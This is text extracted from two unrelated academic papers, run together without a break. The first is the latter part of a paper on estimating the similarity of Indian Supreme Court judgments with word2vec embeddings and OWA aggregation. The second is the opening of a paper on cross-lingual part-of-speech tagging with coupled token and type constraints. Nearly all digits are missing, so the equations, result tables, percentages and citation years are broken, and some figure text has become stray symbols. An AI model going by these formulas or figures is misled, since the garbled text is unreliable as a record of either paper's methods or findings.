judgments to be the item and the various possible criteria could be: degree of match in facts of the case, degree of match in case citations, degree of match in the defense counsel’s argument, etc. in this case, the pair of judgments would be evaluated according to each of the criteria and according to our choice of linguistic aggregation needed i.e., most, some, etc, the overall similarity can be computed. it is to be noted here that the set of criteria for legal judgments is not fixed and is determined for each document pair based on the concepts derived in each document. the owa operator (yager, ) is defined as definition: owa operator a function f : rn → r is called on ordered weighted averaging (owa) operator of dimension ‘n’ if it has an associated weighting vector w of dimension ‘n’ such that: ( ) n∑ i= wi= ( )wi∈[ , ]∀i= , ···,n where, f is defined as f(x ,x ,...,xn)= ∑n i= wiyi, where yi is the ‘i’th largest value in the set of elements {x ,x ,...,xn}. owa can be used to emulate different aggregation operators such as max, min, average, etc, by adjusting the weights wi,∀i= , ···,n, suitably. these linguist operators fall in between the extremes of ‘‘at least one’’ to ‘‘all’’. in the current work, we propose to use the ‘‘most’’ aggregation operator. in this paper, we just outline the method of arriving at the weights for the owa operator and do not discuss the reasoning behind it. an in-depth presentation of the owa operators is presented in (carlsson & fullér, ). if there are ‘p’ criteria for evaluating the similarity between a pair of documents (i.e., p concepts matches between a pair of documents), then we define an operator qmost, corresponding to the linguistic quantifier ‘‘most’’ as qmost(x)=x . then the weights for the owamost operator can be determined by the formula (carlsson & fullér, ) as: w(i)= q ( i p ) −q ( i− p ) ( ) figure depicts similarity estimation using owa as described above for a sample pair of judgments. as shown in the figure, for the first judgment (doc ), three concepts are identified which are represented using three corresponding set of words. for the second judgment (doc ), two concepts are identified. the computation of similarity depicted in the figure is performed on the sentences representative of these concepts as explained above. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure similarity computation using communities derived for a pair of judgments. note that the concept node colors reflect the similarity between concepts. full-size doi: . /peerjcs. /fig- the similarity so computed for various documents can then be used to rank judgments in order of relevance to a query judgment. table depicts the sample results obtained for a pair of judgments ranked as similar (ranked as on a scale of – ) by human expert. weight in the table represents the similarity of the sentence with the identified concept. using the proposed approach of similarity estimation using owa, a similarity score of . is obtained for this pair of judgments. the following few sections present the efficacy of the proposed method using various experiments. experimental evaluation we use indian supreme court case judgments from years ranging from to for this study. these documents are used during the training phase to learn vector representations for words. case judgments used for the experiments in this work were crawled from website http://www.judis.nic.in. experimental setup some of the judgments documents are extremely small and may not reveal any pattern. we considered , judgments with a length of more than sentences for this work. these documents are cleaned by removing the metadata information about the date, judge’s names, bench details, etc. while this information may be required for searching a particular case, it doesn’t contribute to the similarity among case judgment. judgments contain a lot of non-text information like section and rule numbers, specific number and wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://www.judis.nic.in http://dx.doi.org/ . /peerj-cs. table extraction of concepts and representative sentences—sample results. case concept most representative sentences for the concept weight case ‘author’, ‘time’, ‘detent’, ‘order’, ‘ground’ ‘when the act contemplates the furnishing of grounds of detention ordinarily within five days of the order of detention the intention is clear that the statements and documents which are referred to in the grounds of detention and which are required by the detenu and are expected to be in possession of the detaining authority should be furnished with reasonable expedition. . ‘‘that was obviously necessary because the information leading to the order of detention was laid by the customs authorities.the grounds of detention were also served on her on the same day.it was received by the home department of the delhi administration on january , but was actually placed before the administrator on january , when the detaining authority confirmed the order of detention. . the authorities who laid the information before the detaining authority and who were primarily concerned in the matter were the customs authorities via the director of rev- enue intelligence. . ‘detenu’, ‘repre- sent’, ‘hear’, ‘delay’, ‘right’ ‘there was inexcusable delay in enabling the detenu to make a representation and indis- posing of the representation.in sukul\’s case (supra) the court also made certain perti- nent observations (at pages – ):\n’’no definite time can be laid down within which a representation of a detenu should be dealt with save and except that it is a constitutional right of a detenu to have his representation considered as expeditiously as possible.(supra) the detenu made his representation on th and th of march , the advisory board gave a hearing on th march and the detaining authority rejected the representation on th march. . the rejection of the representation was communicated to the detenu on january , . . we have ourselves examined the records and we find that though the administrator con- sidered the representation of the detenu after the hearing by the board, the administrator was entirely uninfluenced by the hearing before the board. . case ‘order’, ‘detent’, ‘opin- ion’, ’ground ‘under section of the act grounds of order of detention are to be disclosed to the per- sons affected by the order not later than days from the date of detention and the act fur- ther requires to afford the person affected by the order the earliest opportunity of mak- ing a representation against the order to the appropriate government.on january, the governor was pleased to confirm the order of detention after the advisory board had given opinion that there was sufficient cause for detention of the petitioner. . by an order dated august, the governor was pleased to confirm the order of de- tention of the petitioner.( ) the opinion of this court in the case of sk. section i i of the act states that the government may confirm the detention order if the advisory board gives an opinion to that effect.’ . ‘detenu’, ‘releas’, ‘mat- ter’, ’section ′, ‘right’, ‘action’ ‘if thereafter the advisory board will express an opinion in favour of release of the detenu the government will release the detenu.if the advisory board will express any opinion against the release of the detenu the government may still exercise the power to release the detenu. . if the appropriate government will release the detenu the government will not send the matter to the advisory board. . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. naming conventions used for references that include special characters that need to be preserved. such information poses challenges in the pre-processing task and demands a domain-specific pre-processing which is important for deciding similarity. following pre-processing steps are used in our work (a) preserve numbers and special characters wherever significant by removing space between word and number. used for citation objects with numbers for example section converted to section , clause (a) converted to clause a. (b) use common nomenclature for citation objects(ipc <->indian penal code, constitu- tion of india <->indian constitution etc.).( guide to legal citation, ) (c) perform generic linguistic pre-processing of case conversion, english stop word removal stemming and lemmatization, punctuation and number removal. only numbers as words are removed i.e., section retained but a number removed. (d) remove legal stop words. some words (e.g., petitioner, petition, respondent, court, etc.) appear in almost every judgment. we construct legal stop word set forming a list of words having the highest frequency across all documents and remove these words from the documents. the set of , judgment documents pre-processed as above is used for training in the proposed work to obtain word embedding and tf-idf weights for words which are used for calculation of similarity. we used gensim package word vec library (gensim, ) for implementation. word vec function is trained on pre-processed judgment corpus. the function results in a vector representation of every word of the considered documents. we experimented with different vector dimensions for training word vec. best results were obtained for vector dimension which is used for all the experiments in this work. we used gensim tf-idf library (gensim, ) for obtaining tf-idf weights for the words in the document collection. experimental results and discussion similarity estimation for legal documents facilitates two primary operations in lir namely pairwise similarity estimation and extraction of relevant judgments from a collection of documents. the value of pairwise similarity obtained for a pair of docu- ments, can guide a user in establishing the parallel the between two documents whereas similarity of a document with all other documents can be used for ranked retrieval in lir. we evaluate our experiments of finding similarity among legal documents with the help of two different test approaches. we use binary classification for estimating pairwise similarity and information retrieval techniques to demonstrate the effectiveness of proposed approach in extraction of relevant documents. the following sub-sections elaborate these test approaches and the metrics used for the evaluation of the results. . pairwise similarity estimation—we use the proposed approach of similarity esti- mation using owa operator for finding similarity between a pair of case judgments. in the absence of test data for concept-wise similarity, we compare the results of our proposed approach with existing work for estimation of single similarity value for a judgment pair. we used the gold standard test dataset (kumar et al., ; mandal et wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al., a; mandal et al., b) for this evaluation. the dataset contains relevance score given by human experts for pairs of judgments of the supreme court of india. for every pair, experts have given similarity ratings with values between – . finding similarity among case judgments using various approaches is presented in mandal et al. ( a), mandal et al. ( b) where authors have highlighted the superiority of results obtained using the document embedding approach, doc vec (le & mikolov, ). to evaluate the effectiveness of our proposed approach in identifying if a pair of judgment is similar or dissimilar, we use a simple binary classification approach. a judgment pair is labeled as similar if the obtained similarity value is greater than the chosen threshold value. we normalized expert scores to transform values in [ , ] range and experimented classification with different thresh- old values. though accuracy is the most commonly used measure of a classifier’s performance, it cannot differentiate between the number of correct labels of different classes. hence we use precision, recall and f-measure to evaluate the effectiveness of our proposed approach. in the context of the binary classification as mentioned above, precision represents the fraction of correctly classified documents among the retrieved documents within a class and is calculated using following equation (sokolova, japkowicz & szpakowicz, ). precision= true positive true positive+false positve recall is the fraction of relevant documents within a class that have been retrieved from the total number of relevant documents. recall can be calculated using the following equation. recall = true positive true positive+false negative f is defined as the weighted harmonic mean of the precision and recall and is computed using the following equation. f score= ∗ precision∗recall precision+recall precision, recall and f score together are used to evaluate classification effec- tiveness. figure shows the results of binary classification obtained for various threshold values. we compare our results with the existing prior work (mandal et al., a; mandal et al., b) for finding similarity among legal judgments. thus doc vec in the fig. and table represent pairwise similarity estimation using document embedding scheme reported by mandal et al., ( a); mandal et al., ( b). table presents the comparison of the results. we have included only the best case results for the experimented approaches. as described in the previous subsections, we use two vector representations namely word vec and word vec with idf for every word in the representative sentences for each concept. as it can be seen wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from table , our proposed approach gives results comparable with the existing approach of document embedding. it can be seen form the results that combining idf, the inverted document frequency with the word vectors results into better f score of . for pairwise similarity estimation. it is also to be noted that the overall f score of . obtained by using only word vec is comparable with existing approach. to evaluate the effectiveness of our proposed approach, we also performed pairwise t test of statistical significance on the f scores obtained for individual cases in the test dataset. the test resulted into a confidence score of % when compared with existing approach. . extraction of relevant judgments from a collection of documents—we use the proposed approach of similarity estimation for extraction of relevant judgments from a collection of judgment corpus. we use ranked information retrieval technique to evaluate the effectiveness of our approach. a judgment contains references (citations) to multiple cases for justifying the validity of arguments and decisions during the proceedings of a case. these cited cases are called as precedents and are considered to have very high relevance with the citing case. for this evaluation, we construct test data as follows • a query set, q is constructed by hiding all the references to precedents present in the text of the judgment. we use |q|= • a document corpus, dc, which, along with many other judgments contains precedents i.e., the judgments cited by judgments in the query set q. dc is used as a document base for extraction of relevant judgments. we use |dc|= . in the context of information retrieval, precision and recall are estimated differently than that of the classification approach and can be explained using following equa- tions: precision= |{retrieved document}∩{relevant document}| |{retrieveddocuments}| recall = |{retrieved document}∩{relevant document}| |{relevantdocuments}| . in a ranked information retrieval system, precision and recall values calculated at given cut-off k, i.e., precision@k and recall@k are used as evaluation metrics (manning, raghavan & schütze, ). precision recall values can be plotted to obtain precision recall curves which provide visual exploration of retrieved results at different levels of precision and recall. interpolating precision to next higher recall is a common practice to obtain a smoother precision recall curve (manning, raghavan & schütze, ). figure shows sample precision recall curves obtained for a query. when cut off is taken at r, the known number of relevant documents in the corpus, it is called as r-precision which is used extensively for evaluation of results in ranked retrieval systems. we use precision@k, r-precision and recall@k for the evaluation of the results of our proposed approach. results obtained for different values of k are wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure precision, recall and f score for different threshold values. (a) precision, recall and f score for threshold value≥ . . (b) precision, recall and f score for threshold value≥mean of obtained sim- ilarity values. (c) precision, recall and f score for threshold value > . (d) precision, recall and f score for threshold value≥ . ′. full-size doi: . /peerjcs. /fig- summarized in table . we compare the results with previous work on the extraction of relevant judgments of the supreme court of india (mandal et al., a; mandal et al., b). in this work best performance of retrieval is obtained by considering only the citation context, i.e., the paragraph around the case citation in a judgment and then applying inverted document frequency, idf for estimation of similarity. as it can be seen from the results presented in table , our proposed approach clearly outperforms the existing work. we obtain the best result of . for r-precision which highlights the effectiveness of the proposed result for ranked retrieval of judgments. the proposed approach also results in higher values of recall for a smaller cut of value, k = ascertaining its efficacy in retrieving relevant judgments within a document collection. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table pairwise similarity estimation. approach precision recall f score word vec using owa . . . word vec idf weighted using owa . . . doc vec . . . figure sample precision recall plot obtained at rank . full-size doi: . /peerjcs. /fig- conclusions establishing relevance among legal documents is a very complex task and demands specialized approaches to similarity estimation. in this paper, we presented a novel approach of extracting prominent concepts from the document for finding the similarity among legal judgments. we presented legal document similarity estimation as a multi- criteria decision-making problem which we solved using aggregation operator owa. in addition to the improvement in the results, the proposed approach provides multiple levels of similarities which facilitates visualization and can be useful for deeper insights into the notion of relevance among court judgments. the presented approach is entirely data-driven as the concepts to be matched are extracted intrinsically and there is no need for the user to formulate a query. the proposed approach also extracts sentences specific to every concept and set of these sentences can be used as a condensed representation for the judgment document. the proposed approach used common nouns to identify basic concept words. in future, we would like to use more sophisticated methods like named entities and entity co-references for identification of concepts. community detection wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table extraction of relevant judgments: ranked information retrieval. proposed approach existing work method used precision @ precision @r recall @ recall @ recall @ method used precision @ recall @ word vec . . . . . idf, citation context . . parsimonious language model, citationcontext . . word vec with idf weight . . . . . citation context . . dirichlet prior smoothing . . algorithms based on centrality and between-ness can be explored for the identification of prominent communities. we would like to explore the possibility of introducing the concept weighting scheme based on the importance of a concept in various sub-domains of law for a deeper understanding of relevance. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • rupali s. wagh and deepa anand conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the data is available at figshare: wagh, rupali ( ): document corpus of court case judgments. figshare. dataset. https://doi.org/ . /m .figshare. .v . references bench-capon t, bench-capon t, araszkiewicz m, ashley k, atkinson k, bex f, borges f, bourcier d, bourgine p, conrad jg, francesconi e, gordon tf, governatori g, leidner jl, lewis dd, loui rp, mccarty lt, prakken h, schilder f, schweighofer e, thompson p, tyrrell a, verheij b, walton dn, wyner az. . a history of ai and law in papers: years of the international conference on ai and law. artificial intelligence and law ( ): – doi . /s - - -x. branting lk. . data-centric and logic-based models for automated legal problem solving. artificial intelligence and law ( ): – doi . /s - - -x. wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. carlsson c, fullér r. . compound interdependences in mop. in: proceedings of the fourth european congress on intelligent techniques and soft computing (eufit’ ). casanovas p, casanovas p, palmirani m, peroni s, van engers t, vitali f. . semantic web for the legal domain: the next step. semantic web ( ): – doi . /sw- . community detection for networkx’s documentation. . available at https:// python-louvain.readthedocs.io/en/latest/ (accessed on march ). cui p, wang x, pei j, zhu w. . a survey on network embedding. ieee transactions on knowledge and data engineering ( ): – . de meo p. . generalized louvain method for community detection in large networks. in: th international conference on intelligent systems design and applications. gensim. . models.word vec word vec embedding. available at https:// radimrehurek.com/gensim/models/word vec.html (accessed on february ). goyal p, ferrara e. . graph embedding techniques, applications, and performance: a survey. knowledge-based systems : – doi . /j.knosys. . . . grover a, leskovec j. . node vec: scalable feature learning for networks. in: proceedings of the nd acm sigkdd international conference on knowledge discovery and data mining. acm. koniaris m, anagnostopoulos i, vassiliou y. . network analysis in the legal domain: a complex model for european union legal sources. journal of complex networks ( ): – . kumar s, reddy pk, reddy vb, suri m. . finding similar legal judgements under common law system. in: international workshop on databases in networked informa- tion systems. berlin, heidelberg: springer. lau jh, baldwin t. . an empirical evaluation of doc vec with practical insights into document embedding generation. arxiv preprint. arxiv: . . le q, mikolov t. . distributed representations of sentences and documents. in: international conference on machine learning. liu b, niu d, wei h, lin j, he y, lai k, y xu. . matching long text documents via graph convolutional networks. arxiv preprint. arxiv:arxiv: . . mandal a, mandal a, chaki r, saha s, ghosh k, pal a, ghosh s. a. measuring similarity among legal court case documents. in: proceedings of the th annual acm india compute conference. acm. mandal a, ghosh k, bhattacharya a, pal a, ghosh s. b. overview of the fire irled track: information retrieval from legal documents. fire (working notes). – . manning c, raghavan p, schütze h. . introduction to information retrieval. natural language engineering ( ): – doi . /s . mikolov t, chen k, corrado g, dean j. . efficient estimation of word representa- tions in vector space. arxiv preprint. arxiv: . . moody ce. . mixing dirichlet topic models and word embeddings to make lda vec. arxiv preprint. arxiv: . . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /sw- https://python-louvain.readthedocs.io/en/latest/ https://python-louvain.readthedocs.io/en/latest/ https://radimrehurek.com/gensim/models/word vec.html https://radimrehurek.com/gensim/models/word vec.html http://dx.doi.org/ . /j.knosys. . . http://arxiv.org/abs/ . http://arxiv.org/abs/arxiv: . http://dx.doi.org/ . /s http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. nair am, wagh rs. similarity analysis of court judgements using association rule mining on case citation data. onal kd, zhang y, altingovde is, rahman mm, karagoz p, brayla a, dang b, chang h-l, kim h, mcnamara q, angert a, banner e, khetan v, mcdonnell t, nguyen at, xu d, bc wallace, de rijke m, lease m. . neural information retrieval: at the end of the early years. information retrieval journal ( – ): – doi . /s - - -y. ramos j. . using tf-idf to determine word relevance in document queries. in: proceedings of the first instructional conference on machine learning. . saravanan m, ravindran b, raman s. . improving legal information retrieval using an ontological framework. artificial intelligence and law ( ): – doi . /s - - -y. sayyadi h, raschid l. . a graph analytical approach for topic detection. acm transactions on internet technology (toit) ( ): – . sokolova m, japkowicz n, szpakowicz s. . beyond accuracy, f-score and roc: a family of discriminant measures for performance evaluation. in: australasian joint conference on artificial intelligence. berlin: springer. sugathadasa k, ayesha b, de silva n, perera as, jayawardana v, lakmal d, perera m. . legal document retrieval using document vector embeddings and deep learning. in: science and information conference. cham: springer. van opijnen m. . citation analysis and beyond: in search of indicators measuring case law importance. in: jurix. .. vo npa, privault c, guillot f. . experimenting word embeddings in assisting legal review. in: proceedings of the th edition of the international conference on articial intelligence and law. acm. wagh rs, anand d. . application of citation network analysis for improved simi- larity index estimation of legal case documents: a study. in: ieee international conference on current trends in advanced computing (icctac). – . yager rr. . fuzzy logic methods in recommender systems. fuzzy sets and systems ( ): – doi . /s - ( ) - . ying y, qingping t, qinzheng x, ping z, panpan l. . a graph-based approach of automatic keyphrase extraction. procedia computer science : – doi . /j.procs. . . . wagh and anand ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /peerj-cs. transactions of the association for computational linguistics, ( ) – . action editor: sharon goldwater. submitted / ; revised / ; published / . c© association for computational linguistics. token and type constraints for cross-lingual part-of-speech tagging oscar täckström�†∗ dipanjan das‡ slav petrov‡ ryan mcdonald‡ joakim nivre†∗ � swedish institute of computer science † department of linguistics and philology, uppsala university ‡ google research, new york oscar@sics.se {dipanjand|slav|ryanmcd}@google.com joakim.nivre@lingfil.uu.se abstract we consider the construction of part-of-speech taggers for resource-poor languages. recently, manually constructed tag dictionaries from wiktionary and dictionaries projected via bitext have been used as type constraints to overcome the scarcity of annotated data in this setting. in this paper, we show that additional token constraints can be projected from a resource- rich source language to a resource-poor target language via word-aligned bitext. we present several models to this end; in particular a par- tially observed conditional random field model, where coupled token and type constraints pro- vide a partial signal for training. averaged across eight previously studied indo-european languages, our model achieves a % relative error reduction over the prior state of the art. we further present successful results on seven additional languages from different families, empirically demonstrating the applicability of coupled token and type constraints across a diverse set of languages. introduction supervised part-of-speech (pos) taggers are avail- able for more than twenty languages and achieve ac- curacies of around % on in-domain data (petrov et al., ). thanks to their efficiency and robustness, supervised taggers are routinely employed in many natural language processing applications, such as syn- tactic and semantic parsing, named-entity recognition and machine translation. unfortunately, the resources required to train supervised taggers are expensive to create and unlikely to exist for the majority of written ∗work primarily carried out while at google research. languages. the necessity of building nlp tools for these resource-poor languages has been part of the motivation for research on unsupervised learning of pos taggers (christodoulopoulos et al., ). in this paper, we instead take a weakly supervised approach towards this problem. recently, learning pos taggers with type-level tag dictionary constraints has gained popularity. tag dictionaries, noisily pro- jected via word-aligned bitext, have bridged the gap between purely unsupervised and fully supervised taggers, resulting in an average accuracy of over % on a benchmark of eight indo-european languages (das and petrov, ). li et al. ( ) further im- proved upon this result by employing wiktionary as a tag dictionary source, resulting in the hitherto best published result of almost % on the same setup. although the aforementioned weakly supervised approaches have resulted in significant improvements over fully unsupervised approaches, they have not exploited the benefits of token-level cross-lingual projection methods, which are possible with word- aligned bitext between a target language of interest and a resource-rich source language, such as english. this is the setting we consider in this paper (§ ). while prior work has successfully considered both token- and type-level projection across word-aligned bitext for estimating the model parameters of genera- tive tagging models (yarowsky and ngai, ; xi and hwa, , inter alia), a key observation under- lying the present work is that token- and type-level information offer different and complementary sig- nals. on the one hand, high confidence token-level projections offer precise constraints on a tag in a particular context. on the other hand, manually cre- http://www.wiktionary.org/. ated type-level dictionaries can have broad coverage and do not suffer from word-alignment errors; they can therefore be used to filter systematic as well as random noise in token-level projections. in order to reap these potential benefits, we pro- pose a partially observed conditional random field (crf) model (lafferty et al., ) that couples to- ken and type constraints in order to guide learning (§ ). in essence, the model is given the freedom to push probability mass towards hypotheses consistent with both types of information. this approach is flex- ible: we can use either noisy projected or manually constructed dictionaries to generate type constraints; furthermore, we can incorporate arbitrary features over the input. in addition to standard (contextual) lexical features and transition features, we observe that adding features from a monolingual word cluster- ing (uszkoreit and brants, ) can significantly im- prove accuracy. while most of these features can also be used in a generative feature-based hidden markov model (hmm) (berg-kirkpatrick et al., ), we achieve the best accuracy with a globally normalized discriminative crf model. to evaluate our approach, we present extensive results on standard publicly available datasets for languages: the eight indo-european languages pre- viously studied in this context by das and petrov ( ) and li et al. ( ), and seven additional lan- guages from different families, for which no compa- rable study exists. in § we compare various features, constraints and model types. our best model uses type constraints derived from wiktionary, together with token constraints derived from high-confidence word alignments. when averaged across the eight languages studied by das and petrov ( ) and li et al. ( ), we achieve an accuracy of . %. this is a % relative error reduction over the previous state of the art. averaged across all languages, our model obtains an accuracy of . % compared to . % obtained by a strong generative baseline. fi- nally, we provide an in depth analysis of the relative contributions of the two types of constraints in § . coupling token and type constraints type-level information has been amply used in weakly supervised pos induction, either via pure manually crafted tag dictionaries (smith and eisner, ; ravi and knight, ; garrette and baldridge, ), noisily projected tag dictionaries (das and petrov, ) or through crowdsourced lexica, such as wiktionary (li et al., ). at the other end of the spectrum, there have been efforts that project token-level information across word-aligned bitext (yarowsky and ngai, ; xi and hwa, ). how- ever, systems that combine both sources of informa- tion in a single model have yet to be fully explored. the following three subsections outline our overall approach for coupling these two types of information to build robust pos taggers that do not require any direct supervision in the target language. . token constraints for the majority of resource-poor languages, there is at least some bitext with a resource-rich source language; for simplicity, we choose english as our source language in all experiments. it is then nat- ural to consider using a supervised part-of-speech tagger to predict part-of-speech tags for the english side of the bitext. these predicted tags can subse- quently be projected to the target side via automatic word alignments. this approach was pioneered by yarowsky and ngai ( ), who used the resulting partial target annotation to estimate the parameters of an hmm. however, due to the automatic nature of the word alignments and the pos tags, there will be significant noise in the projected tags. to conquer this noise, they used very aggressive smoothing tech- niques when training the hmm. fossum and abney ( ) used similar token-level projections, but in- stead combined projections from multiple source lan- guages to filter out random projection noise as well as the systematic noise arising from different source language annotations and syntactic divergences. . type constraints it is well known that given a tag dictionary, even if it is incomplete, it is possible to learn accurate pos taggers (smith and eisner, ; goldberg et al., ; ravi and knight, ; naseem et al., ). while widely differing in the specific model struc- ture and learning objective, all of these approaches achieve excellent results. unfortunately, they rely on tag dictionaries extracted directly from the un- derlying treebank data. such dictionaries provide in depth coverage of the test domain and also list all ��������� ����� ��� ��� � � � ��� ��� ��� �� � �������� ���� ���� ��� � ���� ���� ���� � ��� ���� � � ���� �� ���� ����� � � � ���� ���� ���� ���� � ���� ��� ���� ���� � � ���� ��� ���� ���� ��� figure : lattice representation of the inference search space y(x) for an authentic sentence in swedish (“the farming products must be pure and must not contain any additives”), after pruning with wiktionary type constraints. the correct parts of speech are listed underneath each word. bold nodes show projected token constraints ỹ. underlined text indicates incorrect tags. the coupled constraints lattice ŷ(x,ỹ) consists of the bold nodes together with nodes for words that are lacking token constraints; in this case, the coupled constraints lattice thus defines exactly one valid path. inflected forms – both of which are difficult to obtain and unrealistic to expect for resource-poor languages. in contrast, das and petrov ( ) automatically create type-level tag dictionaries by aggregating over projected token-level information extracted from bi- text. to handle the noise in these automatic dictionar- ies, they use label propagation on a similarity graph to smooth (and also expand) the label distributions. while their approach produces good results and is applicable to resource-poor languages, it requires a complex multi-stage training procedure including the construction of a large distributional similarity graph. recently, li et al. ( ) presented a simple and viable alternative: crowdsourced dictionaries from wiktionary. while noisy and sparse in nature, wik- tionary dictionaries are available for languages. furthermore, their quality and coverage is growing continuously (li et al., ). by incorporating type constraints from wiktionary into the feature-based hmm of berg-kirkpatrick et al. ( ), li et al. were able to obtain the best published results in this setting, surpassing the results of das and petrov ( ) on eight indo-european languages. . coupled constraints rather than relying exclusively on either token or type constraints, we propose to complement the one with the other during training. for each sentence in our training set, a partially constrained lattice of tag sequences is constructed as follows: http://meta.wikimedia.org/wiki/ wiktionary — october . . for each token whose type is not in the tag dic- tionary, we allow the entire tag set. . for each token whose type is in the tag dictio- nary, we prune all tags not licensed by the dictio- nary and mark the token as dictionary-pruned. . for each token that has a tag projected via a high-confidence bidirectional word alignment: if the projected tag is still present in the lattice, then we prune every tag but the projected tag for that token; if the projected tag is not present in the lattice, which can only happen for dictionary- pruned tokens, then we ignore the projected tag. figure provides a running example. the lattice shows tags permitted after constraining the words to tags licensed by the dictionary (up until step from above). there is only a single token “jordbruk- sprodukterna” (“the farming products”) not in the dictionary; in this case the lattice permits the full set of tags. with token-level projections (step ; nodes with bold border in figure ), the lattice can be further pruned. in most cases, the projected tag is both correct and is in the dictionary-pruned lattice. we thus successfully disambiguate such tokens and shrink the search space substantially. there are two cases we highlight in order to show where our model can break. first, for the token “jordbruksprodukterna”, the erroneously projected tag adj will eliminate all other tags from the lattice, including the correct tag noun. second, the token “några” (“any”) has a single dictionary entry pron and is missing the correct tag det. in the case where det is the projected tag, we will not add it to the lattice and simply ignore it. this is because we hy- pothesize that the tag dictionary can be trusted more than the tags projected via noisy word alignments. as we will see in § , taking the union of tags performs worse, which supports this hypothesis. for generative models, such as hmms (§ . ), we need to define only one lattice. for our best gen- erative model this is the coupled token- and type- constrained lattice. at prediction time, in both the discriminative and the generative cases, we find the most likely label sequence using viterbi decoding. for discriminative models, such as crfs (§ . ), we need to define two lattices: one that the model moves probability mass towards and another one defining the overall search space (or partition func- tion). in traditional supervised learning without a dictionary, the former is a trivial lattice containing the gold standard tag sequence and the latter is the set of all possible tag sequences spanning the tokens. with our best model, we will move mass towards the coupled token- and type-constrained lattice, such that the model can freely distribute mass across all paths consistent with these constraints. the lattice defining the partition function will be the full set of possible tag sequences when no dictionary is used; when a dictionary is used it will consist of all dictionary- pruned tag sequences (sans step above; the full set of possibilities shown in figure for our running example). figures and provide statistics regarding the supervision coverage and remaining ambiguity. fig- ure shows that more than two thirds of all tokens in our training data are in wiktionary. however, there is considerable variation between languages: spanish has the highest coverage with over %, while turk- ish, an agglutinative language with a vast number of word forms, has less than % coverage. fig- ure shows that there is substantial uncertainty left after pruning with wiktionary, since tokens are rarely fully disambiguated: . tags per token are allowed on average for types in wiktionary. figure further shows that high-confidence align- ments are available for about half of the tokens for most languages (japanese is a notable exception with other training methods exist as well, for example, con- trastive estimation (smith and eisner, ). avg bg cs da de el es fr it ja nl pt sl sv tr zh p e rc e n t o f to k e n s c o v e re d token coverage wiktionary projected projected+filtered figure : wiktionary and projection dictionary coverage. shown is the percentage of tokens in the target side of the bitext that are covered by wiktionary, that have a projected tag, and that have a projected tag after intersecting the two. . . . . avg bg cs da de el es fr it ja nl pt sl sv tr zh n u m b e r o f ta g s p e r to k e n figure : average number of licensed tags per token on the target side of the bitext, for types in wiktionary. less than % of the tokens covered). intersecting the wiktionary tags and the projected tags (step and above) filters out some of the potentially erroneous tags, but preserves the majority of the projected tags; the remaining, presumably more accurate projected tags cover almost half of all tokens, greatly reducing the search space that the learner needs to explore. models with coupled constraints we now formally present how we couple token and type constraints and how we use these coupled con- straints to train probabilistic tagging models. let x = (x x . . .x|x|) ∈ x denote a sentence, where each token xi ∈v is an instance of a word type from the vocabulary v and let y = (y y . . .y|x|) ∈ y de- note a tag sequence, where yi ∈t is the tag assigned to token xi and t denotes the set of all possible part- of-speech tags. we denote the lattice of all admissible tag sequences for the sentence x by y(x). this is the inference search space in which the tagger operates. as we shall see, it is crucial to constrain the size of this lattice in order to simplify learning when only incomplete supervision is available. a tag dictionary maps a word type xj ∈ v to a set of admissible tags t (xj) ⊆ t . for word types not in the dictionary we allow the full set of tags t (while possible, in this paper we do not at- tempt to distinguish closed-class versus open-class words). when provided with a tag dictionary, the lattice of admissible tag sequences for a sentence x is y(x) = t (x ) ×t (x ) × . . .×t (x|x|). when no tag dictionary is available, we simply have the full lattice y(x) = t |x|. let ỹ = (ỹ ỹ . . . ỹ|x|) be the projected tags for the sentence x. note that {ỹi} = ∅ for tokens without a projected tag. next, we define a piecewise operator _ that couples ỹ and y(x) with respect to every sentence index, which results in a token- and type- constrained lattice. the operator behaves as follows, coherent with the high level description in § . : t̂ (xi, ỹi) = ỹi _ t (xi) = { {ỹi} if ỹi ∈t (xi) t (xi) otherwise . we denote the token- and type-constrained lattice as ŷ(x,ỹ) = t̂ (x , ỹ )×t̂ (x , ỹ )×. . .×t̂ (x|x|, ỹ|x|). note that when token-level projections are not used, the dictionary-pruned lattice and the lattice with cou- pled constraints are identical, that is ŷ(x,ỹ) = y(x). . hmms with coupled constraints a first-order hidden markov model (hmm) specifies the joint distribution of a sentence x ∈ x and a tag-sequence y ∈y(x) as: pβ(x,y) = |x|∏ i= pβ(xi | yi)︸ ︷︷ ︸ emission pβ(yi | yi− )︸ ︷︷ ︸ transition . we follow the recent trend of using a log-linear parametrization of the emission and the transition distributions, instead of a multinomial parametriza- tion (chen, ). this allows model parameters β to be shared across categorical events, which has been shown to give superior performance (berg- kirkpatrick et al., ). the categorical emission and transition events are represented by feature vec- tors φ(xi,yi) and φ(yi,yi− ). each element of the parameter vector β corresponds to a particular fea- ture; the component log-linear distributions are: pβ(xi | yi) = exp ( β>φ(xi,yi) ) ∑ x′i∈v exp (β>φ(x′i,yi)) , 